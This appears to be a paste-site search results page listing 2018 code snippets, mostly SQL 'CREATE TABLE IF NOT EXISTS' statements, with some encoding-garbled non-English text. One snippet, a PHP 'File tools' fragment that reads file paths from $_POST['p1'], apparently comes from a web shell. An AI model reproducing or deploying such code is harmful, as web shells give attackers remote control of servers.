42.7K results in 787 ms
7 years ago · Dec 08, 2018, 08:14 PM
egyszerű táblát készÃtünk el: CREATE TABLE IF NOT EXISTS `employee` ( `id` int(11) NOT
7 years ago · Dec 08, 2018, 06:24 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
7 years ago · Dec 08, 2018, 05:52 PM
Displaylines: - "" - "&bIsland&f:" - "&cYou do not own an Island." - " &8- &7/island create" - "" - "&bProfile&f:" - " &8- &7Rank&8: &fDefault"
7 years ago · Dec 08, 2018, 05:00 PM
IF NOT EXISTS ПолПоÑлед; CREATE TABLE IF NOT EXISTS Пол ( Код int primary
7 years ago · Dec 08, 2018, 04:58 PM
TABLE IF EXISTS `avions`; CREATE TABLE IF NOT EXISTS `avions` ( `idAvion` int(11) NOT
7 years ago · Dec 08, 2018, 03:08 PM
dbname="..dbname..";host="..host.."", ""..username.."", ""..password.."") dbExec(con, "CREATE TABLE IF NOT EXISTS feedbacks (update_post TEXT, message
7 years ago · Dec 08, 2018, 02:36 PM
static final String locationSQL = "CREATE TABLE IF NOT EXISTS location(id integer primary key,
7 years ago · Dec 08, 2018, 02:20 PM
dbname="..dbname..";host="..host.."", ""..username.."", ""..password.."") dbExec(con, "CREATE TABLE IF NOT EXISTS feedbacks (update_post TEXT, message
7 years ago · Dec 08, 2018, 01:32 PM
structure for table hivemind.character_data CREATE TABLE IF NOT EXISTS `character_data` ( `CharacterID` int(10) unsigned
7 years ago · Dec 08, 2018, 01:02 PM
initialize code goes here if CLIENT then // Create a new table for every weapon instance
7 years ago · Dec 08, 2018, 12:12 PM
Hive Database #Create Database: CREATE DATABASE IF NOT EXISTS yourusername #Switch Database: USE
7 years ago · Dec 08, 2018, 11:36 AM
CREATE DATABASE test1; CREATE DATABASE IF NOT EXISTS test1; CREATE DATABASE `test
7 years ago · Dec 08, 2018, 11:24 AM
http_host. Variants: '', 'path/to/subfolder' // Will not working if $root_path will be outside
7 years ago · Dec 08, 2018, 09:20 AM
TABLE IF EXISTS `transaksi` ; CREATE TABLE IF NOT EXISTS `transaksi` ( `id_transaksi` INT NOT
7 years ago · Dec 08, 2018, 09:02 AM
dbfile $ \conn -> S.execute_ conn "CREATE TABLE IF NOT EXISTS users ( `id` INTEGER PRIMARY
7 years ago · Dec 08, 2018, 09:02 AM
dbfile $ \conn -> S.execute_ conn "CREATE TABLE IF NOT EXISTS users ( `id` INTEGER PRIMARY
7 years ago · Dec 08, 2018, 08:52 AM
entities. ServerLog: AWarn: Message Table Exists ServerLog: AWarn: Player Data
7 years ago · Dec 08, 2018, 08:52 AM
TABLE IF EXISTS `mydb`.`transaksi` ; CREATE TABLE IF NOT EXISTS `mydb`.`transaksi` ( `id_transaksi` INT NOT
7 years ago · Dec 08, 2018, 08:02 AM
forward 07:57:05.056 [info] execute "create extension if not exists \"uuid-ossp\"" ** (Postgrex.Error) ERROR 42501
Total pages: 2134